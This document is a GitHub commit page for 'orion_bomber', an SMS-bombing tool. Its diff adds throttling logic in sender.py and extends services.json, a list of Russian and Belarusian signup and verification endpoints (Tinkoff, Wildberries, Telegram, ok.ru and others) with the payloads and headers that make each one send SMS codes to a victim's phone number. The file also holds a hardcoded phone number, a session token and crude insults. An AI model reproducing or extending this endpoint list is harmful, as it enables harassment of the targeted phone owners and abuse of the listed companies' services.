Skip to content

Commit 0d04e8a

Browse files
committed
Update 1.1.0 by Lucky | Services by Lostik
1 parent 89ce304 commit 0d04e8a

File tree

7 files changed

+192
-59
lines changed

7 files changed

+192
-59
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@
77
###### [![geonodee](https://img.shields.io/badge/Telegram-blue?style=for-the-badge&logo=Telegram)](https://t.me/orion_bomber)
88
#
99
# 💻Меню
10-
![Alt-текст](https://i.ibb.co/D8Bty5Z/rounded-in-photoretrica.png)
10+
![Alt-текст](https://i.ibb.co/n34G0kp/menu.png)
1111
___
1212
# ❤️️**Без них не обошлись**
1313
| Метод | Описание | Ссылки|

main.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@
1010
tools.clear()
1111
tools.check_files()
1212
tools.CFU()
13+
tools.CTF()
1314

1415
while True:
1516
tools.clear()

tools/sender.py

Lines changed: 23 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -60,17 +60,37 @@ def __init__(self, country):
6060
'User-Agent': None}
6161

6262
def checktimeout(self, service):
63-
time_out_ = self.time_out_
63+
#time_out_ = self.time_out_
64+
a = open("tools/timeout.txt", "r")
65+
time_out_ = {}
66+
all_ = a.read().split("\n")
67+
while True:
68+
try:
69+
all_.remove("")
70+
except:
71+
break
72+
for serv in all_:
73+
time_out_[serv.split(":")[0]] = float(serv.split(":")[1])
74+
a.close()
75+
6476
time_out_config = self.time_out_config
6577
if time_out_[service] == 0:
6678
time_out_[service] = time.time()
79+
a = open("tools/timeout.txt", "w")
80+
for key in time_out_:
81+
a.write(key+":"+str(time_out_[key])+"\n")
82+
a.close()
6783
return True
6884
else:
6985
old_time = time_out_[service]
7086
now_time = time.time()
7187
try:
7288
if now_time - old_time >= time_out_config[service]:
7389
time_out_[service] = time.time()
90+
a = open("tools/timeout.txt", "w")
91+
for key in time_out_:
92+
a.write(key+":"+str(time_out_[key])+"\n")
93+
a.close()
7494
return True
7595
else:
7696
return False
@@ -232,5 +252,5 @@ def spam(self, service, phone, proxy=None):
232252
return 200, r.text
233253
else:
234254
return r.status_code, r.text
235-
except:
236-
return False, False # https://t.me/orion_bomber
255+
except Exception as e:
256+
return False, e # https://t.me/orion_bomber

tools/services.json

Lines changed: 80 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -57,10 +57,15 @@
5757
"b_apteka": {
5858
"url": "https://b-apteka.ru/lk/send_confirm_code",
5959
"json": "{'phone': '*phone*'}",
60-
"headers": {"X-Requested-With": "XMLHttpRequest", "Connection": "keep-alive", "Pragma": "no-cache",
61-
"Cache-Control": "no-cache", "Accept-Encoding": "gzip, deflate, br",
62-
"User-Agent": "",
63-
"DNT":"1"},
60+
"headers": {
61+
"X-Requested-With": "XMLHttpRequest",
62+
"Connection": "keep-alive",
63+
"Pragma": "no-cache",
64+
"Cache-Control": "no-cache",
65+
"Accept-Encoding": "gzip, deflate, br",
66+
"User-Agent": "",
67+
"DNT": "1"
68+
},
6469
"response": 200,
6570
"timeout": 60
6671
},
@@ -79,7 +84,15 @@
7984
"mt_free": {
8085
"url": "https://cabinet.wi-fi.ru/api/auth/by-sms",
8186
"data": "{'msisdn': '*mtfree*', 'g-recaptcha-response': ''}",
82-
"headers": {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7", "App-ID": "cabinet", "Cache-Control": "no-cache", "Connection": "keep-alive", "User-Agent": ""},
87+
"headers": {
88+
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
89+
"Accept-Encoding": "gzip, deflate, br",
90+
"Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
91+
"App-ID": "cabinet",
92+
"Cache-Control": "no-cache",
93+
"Connection": "keep-alive",
94+
"User-Agent": ""
95+
},
8396
"response": "json",
8497
"timeout": 180
8598
},
@@ -114,7 +127,7 @@
114127
"response": 200,
115128
"timeout": 600
116129
},
117-
"SberUslugi":{
130+
"SberUslugi": {
118131
"url": "https://sberuslugi.ru/api/v1/user/secret",
119132
"data": "{'phone': '*phone()*'}",
120133
"response": 200,
@@ -152,7 +165,7 @@
152165
"timeout": 60,
153166
"cookies": "https://beerlogapizza.ru/login/"
154167
},
155-
"pizzamia":{
168+
"pizzamia": {
156169
"url": "https://1603.smartomato.ru/account/session",
157170
"data": "{'g-recaptcha-response': 'null','phone': '*phone3*'}",
158171
"response": 200,
@@ -162,77 +175,127 @@
162175
"url": "https://online.lenta.com/api.php",
163176
"data": "{'tel': '*phone()*', 'accept': 'on', 'urlParams': ''}",
164177
"response": 200,
165-
"headers": {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7", "Cache-Control": "no-cache", "Connection": "keep-alive", "User-Agent": "", "X-Requested-With": "XMLHttpRequest"},
178+
"headers": {
179+
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
180+
"Accept-Encoding": "gzip, deflate, br",
181+
"Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
182+
"Cache-Control": "no-cache",
183+
"Connection": "keep-alive",
184+
"User-Agent": "",
185+
"X-Requested-With": "XMLHttpRequest"
186+
},
166187
"timeout": 60,
167188
"cookies": "https://online.lenta.com"
168189
},
169190
"wildberries": {
170191
"url": "https://authorization.wildberries.eu/api/v2/code/request",
171192
"json": "{\"contact\": \"*phone*\", \"auth_method\": \"sms\", \"lang\": \"ru\"}",
172193
"response": 200,
173-
"HZF": "сосет смачные пенисы. хуеглот",
194+
"timeout": 60
195+
},
196+
"findclone": {
197+
"url": "https://findclone.ru/register",
198+
"data": "{'phone': '*phone*'}",
199+
"response": 200,
200+
"timeout": 60,
201+
"GET": ""
202+
},
203+
"tashirpizza": {
204+
"url": "https://tashirpizza.ru/ajax/mindbox_register",
205+
"data": "{'phone': '*phone()*', 'fio': 'Олег Олегов Олегович', 'bd': ''}",
206+
"response": 200,
207+
"timeout": 60
208+
},
209+
"my-shop": {
210+
"url": "https://my-shop.ru/cgi-bin/my_util2.pl?q=my_code_for_phone_confirmation&view_id=d51a4d42-c5e8-43ce-a24d-383a3b29f17ae821ed918",
211+
"json": "{'phone_code': '7', 'phone': '*-phone*'}",
212+
"response": 200,
213+
"timeout": 60
214+
},
215+
"moneyman": {
216+
"url": "https://msk.taxovichkof.ru/api/userSendSms",
217+
"json": "{'username': '+7 (950) 213-5308', 'lang': 'ru', 'city': 'msk'}",
218+
"response": 200,
219+
"timeout": 300
220+
},
221+
"tinkoff": {
222+
"url": "https://www.tinkoff.ru/api/common/v1/sign_up?origin=web%2Cib5%2Cplatform&sessionid=uRdqKtttiyJYz6ShCqO076kNyTraz7pa.m1-prod-api56&wuid=8604f6d4327bf4ef2fc2b3efb36c8e35",
223+
"data": "{'phone': '*phone*'}",
224+
"response": 200,
225+
"timeout": 60
226+
},
227+
"sipnetru": {
228+
"url": "https://register2.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=*phone*",
229+
"response": 200,
174230
"timeout": 60
175231
}
176232
}
177233
],
178234
"by":
179235
[
180236
{
181-
"telegram": {
237+
"telegram_by": {
182238
"url": "https://my.telegram.org/auth/send_password",
183239
"data": "{'phone': '*+phone*'}",
184240
"response": 200,
185241
"timeout": 120
186242
},
187-
"green": {
243+
"green_by": {
188244
"url": "https://www.green-market.by/registration_send_sms_code",
189245
"data": "{'phone': '*green*'}",
190246
"headers": {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7", "Cache-Control": "no-cache", "Connection": "keep-alive", "User-Agent": "", "X-CSRF-TOKEN": "", "X-Requested-With": "XMLHttpRequest"},
191247
"response": 200,
192248
"timeout": 60,
193249
"cookies": "https://www.green-market.by/"
194250
},
195-
"ok.ru": {
251+
"ok.ru_by": {
196252
"url": "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",
197253
"data": "{'st.r.phone': '*+phone*'}",
198254
"response": 200,
199255
"timeout": 60,
200256
"cookies": "https://ok.ru/"
201257
},
202-
"sosedi": {
258+
"sosedi_by": {
203259
"url": "https://sosedi.by/local/api/smsSend.php",
204260
"json": "{'phone':'*sosedi*'}",
205261
"response": 200,
206262
"timeout": 60,
207263
"cookies": "https://sosedi.by/"
208264
},
209-
"av.by": {
265+
"av.by_by": {
210266
"url": "https://api.av.by/auth/phone/sign-up",
211267
"json": "{\"name\":\"Олег\",\"password\":\"HifbWy523i46oO\",\"phone\":{\"country\":1,\"number\":\"*-phone*\"},\"userEula\":{\"accepted\":true}}",
212268
"response": 204,
213269
"timeout": 60,
214270
"cookies": "https://av.by"
215271
},
216-
"carte": {
272+
"carte_by": {
217273
"url": "https://carte.by/auth/",
218274
"data": "{'ajax': 'register', 'login': 'Olegkiller229', 'pass': 'CbivnE5316', 'phone': '*+phone*', 'code': '', 'company': 0, 'resend': 1, 'checksum': 675}",
219275
"response": 200,
220276
"timeout": 30,
221277
"cookies": "https://carte.by/"
222278
},
223-
"delivio": {
279+
"delivio_by": {
224280
"url": "https://delivio.by/be/api/register",
225281
"json": "{'phone': '*+phone*'}",
226282
"response": 201,
227283
"timeout": 60,
228284
"cookies": "https://delivio.by/"
229285
},
230-
"wildberries": {
286+
"wildberries_by": {
231287
"url": "https://authorization.wildberries.eu/api/v2/code/request",
232288
"json": "{\"contact\": \"*phone*\", \"auth_method\": \"sms\", \"lang\": \"ru\"}",
233289
"response": 200,
234290
"HZF": "не умеет добавлять сервисы, и легко сливаетя, и ваще он полудурок копченый",
235291
"timeout": 60
292+
},
293+
"findclone_by": {
294+
"url": "https://findclone.ru/register",
295+
"data": "{'phone': '*phone*'}",
296+
"response": 200,
297+
"timeout": 60,
298+
"GET": ""
236299
}
237300
}
238301
]

0 commit comments

Comments
 (0)